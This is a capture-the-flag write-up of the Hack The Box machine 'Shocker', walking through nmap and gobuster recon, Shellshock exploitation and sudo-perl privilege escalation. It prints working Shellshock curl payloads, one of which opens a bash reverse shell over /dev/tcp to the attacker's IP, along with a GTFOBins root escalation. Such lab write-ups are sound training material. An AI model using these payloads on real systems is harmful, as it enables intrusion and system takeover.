---
title: "HTB: Shocker"
date: 2021-07-16
classes: wide
categories:
  - Hackthebox
tag:
  - shellshock 
  - gobuster 
  - perl priv esc
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/shocker/shocker.png" alt="">

# Summary

The name of this machine was a big giveaway for the vulnerability that is used to exploit this machine; shellshock. Shocker begins by identifying a file /cgi-bin/user.sh which is a big hint that this machine is vulnerable to shellshock. Then I am able to use a curl one liner changing the user agent to execute code on the machine. I then use this remote code execution to get a reverse shell on the machine and then run linpeas and see that shelly can execute perl as sudo without a password which gtfobins shows there is a way to escalate privileges with. So without further or do let's get into shocker from hackthebox 

# Recon

```
nmap -A -oN nmap/initial.txt $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-16 09:54 BST
Nmap scan report for 10.10.10.56
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
```

Then an all port scan

```
$nmap -p- oN nmap/all-ports $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-16 11:58 BST
Failed to resolve "oN".
Unable to split netmask from target expression: "nmap/all-ports"
Nmap scan report for 10.10.10.56
Host is up (0.026s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds
```


# Enumeration of services

## HTTP 80

Running a gobuster using "directory-list-2.3-medium.txt" gives a no directories. So changing the wordlist to "common.txt" gives a few interesting directories 

```
$/home/purplerabbit/Documents/gobuster-linux-amd64/gobuster dir -u http://$ip/ -w /usr/share/wordlists/dirb/common.txt -x -o gobuster-common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & purplerabbittian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              -o
[+] Timeout:                 10s
===============================================================
2021/07/16 18:38:55 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.hta.-o              (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess.-o         (Status: 403) [Size: 298]
/.htpasswd.-o         (Status: 403) [Size: 298]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
         
```

The cgi-bin directory stood out because the machine name is shocker (suggesting the vulnerability is shellshock) and shellshock uses cgi-bin so running a gobuster on this directory with the sh extension gives user.sh

```
$/home/purplerabbit/Documents/gobuster-linux-amd64/gobuster dir -u http://$ip/cgi-bin -w /usr/share/wordlists/dirb/common
.txt -x -o gobuster-big.txt -x sh,txt,php,html 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & purplerabbittian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,txt,php,html
[+] Timeout:                 10s
===============================================================
2021/07/16 12:28:57 Starting gobuster in directory enumeration mode
===============================================================
--snipped--
/user.sh              (Status: 200) [Size: 118]
```

# Shellshock explained 

Shellshock is a vulnerability in bash that allows attackers to execute commands on the remote system (remote code execution) affecting bash up to version 4.3. Shellshock doesn't just affect webs servers but also email servers and DNS servers that use Bash to communicate to the OS. The vulnerability is due to the way Bash incorrectly executes trailing commands when it imports a function definition stored into an environment variable.

Further reading:

<https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf>

<https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/>


# Shell as Shelly 

Looking at how to exploit this vulnerability on this github repo <https://github.com/opsxcq/exploit-CVE-2014-6271> shows that we can run a curl one liner to cat the /etc/passwd file. Running this one liner woks and we get the output of /etc/passwd

```
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://$ip/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
```

So now I have remote code execution on the machine. I tried using netcat on the machine, but that failed so I resorted to using a bash reverse shell one liner and that worked 

```
$curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.91/4444 0>&1'" http://$ip/cgi-bin/user.sh
```

Which gives me a shell as shelly

```
$nc -lvp 4444
listening on [any] 4444 ...
10.10.10.56: inverse host lookup failed: Unknown host
connect to [10.10.16.91] from (UNKNOWN) [10.10.10.56] 59650
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
```


# Shelly => Root

Transferring and running linpeas on the machine showed that shelly could run perl as sudo without a password

```
User shelly may run the following commands on Shocker:                                                                 
    (root) NOPASSWD: /usr/bin/perl 
```

Looking at gtfobins <https://gtfobins.github.io/gtfobins/perl/#sudo> showed that there was an easy way to escalate privileges to root.

Following the guidance on gtfobins gave root on the machine

```
shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'exec "/bin/sh";'

whoami
root
```

That was shocker from hackthebox! Hope you enjoyed! 